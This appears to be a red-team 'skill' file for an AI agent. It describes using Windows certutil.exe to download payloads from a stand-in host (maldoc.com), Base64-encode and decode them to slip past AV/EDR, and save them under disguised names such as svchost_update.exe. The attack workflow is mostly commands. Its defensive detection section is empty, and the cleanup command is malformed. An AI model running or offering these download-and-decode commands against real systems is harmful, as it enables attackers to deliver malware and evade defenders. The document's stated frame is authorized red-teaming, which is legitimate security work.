name: certutil-download-execution
description: >
Utilize the native Windows binary certutil.exe to download malicious payloads and optionally
decode Base64 encoded files as a Living-off-the-Land (LotL) technique. This skill details how
attackers bypass application whitelisting and fetch stage-2 implants.
domain: cybersecurity
subdomain: red-teaming
category: Living off the Land
difficulty: basic
estimated_time: "30-60 minutes"
mitre_attack:
tactics: [TA0002, TA0011]
techniques: [T1105, T1140]
platforms: [windows]
tags: [lolbas, certutil, ingress-tool-transfer, defense-evasion, red-teaming, living-off-the-land]
tools: [certutil.exe]
version: "1.0"
author: CyberSkills-Elite
license: Apache-2.0
Payload Download and Decoding via Certutil
When to Use
- During a Red Team engagement or post-exploitation when you have command execution and need to transfer a payload onto the target system.
- When standard tools like
Invoke-WebRequestorbitsadminare blocked or highly monitored by EDR solutions. - To evade network signatures by downloading an innocuous Base64 encoded file and decoding it locally using native Windows tools.
Prerequisites
- Authorized scope and rules of engagement for the target environment
- Appropriate tools installed on the attack/analysis platform
- Understanding of the target technology stack and architecture
- Documentation template ready for findings and evidence capture
Workflow
Phase 1: Basic Ingress Tool Transfer
# Concept: Use certutil.exe to fetch a file via HTTP nimbly # -urlcache: caches the URL. -split: splits the embedded ASN.1 elements and saves to file. -f: forces overwrite.
certutil.exe -urlcache -split -f "http://maldoc.com/payload.exe" C:\Windows\Temp\updater.exe
Phase 2: Defense Evasion through Base64
# base64 raw_payload.exe > payload.b64
Phase 3: Downloading and Decoding on Target
# certutil.exe -urlcache -split -f "http://maldoc.com/payload.b64" C:\Windows\Temp\payload.b64
# certutil.exe -decode C:\Windows\Temp\payload.b64 C:\Windows\Temp\svchost_update.exe
Phase 4: Cleaning Up
# certutil.exe -urlcache -split -f "http://maldoc.com/payload.exe" delete
Decision Point ๐
flowchart TD
A[Attempt Download ] --> B{Blocked by AV/EDR? ]}
B -->|Yes| C[Use Base64 Encoding ]
B -->|No| D[Execute Payload ]
C --> E[Decode & Execute ]
๐ต Blue Team Detection & Defense
- Monitor certutil.exe Execution: Inspect Command Line Arguments: EDR Pattern Matching: Key Concepts
Concept Description
Output Format
Certutil Download Execution โ Assessment Report
============================================================
Target: [Target identifier]
Assessor: [Operator name]
Date: [Assessment date]
Scope: [Authorized scope]
MITRE ATT&CK: [Relevant technique IDs]
Findings Summary:
[Finding 1]: [Severity] โ [Brief description]
[Finding 2]: [Severity] โ [Brief description]
Detailed Results:
Phase 1: [Phase name]
- Result: [Outcome]
- Evidence: [Screenshot/log reference]
- Impact: [Business impact assessment]
Phase 2: [Phase name]
- Result: [Outcome]
- Evidence: [Screenshot/log reference]
- Impact: [Business impact assessment]
Risk Rating: [Critical/High/Medium/Low/Informational]
Recommendations:
1. [Immediate remediation step]
2. [Long-term hardening measure]
3. [Monitoring/detection improvement]
๐ Shared Resources
For cross-cutting methodology applicable to all vulnerability classes, see:
_shared/references/elite-chaining-strategy.mdโ Exploit chaining methodology and high-payout chain patterns_shared/references/elite-report-writing.mdโ HackerOne-optimized report writing, CWE quick reference_shared/references/real-world-bounties.mdโ Verified disclosed bounties by vulnerability class
References
- LOLBAS Project: Certutil.exe
- MITRE ATT&CK: T1105 - Ingress Tool Transfer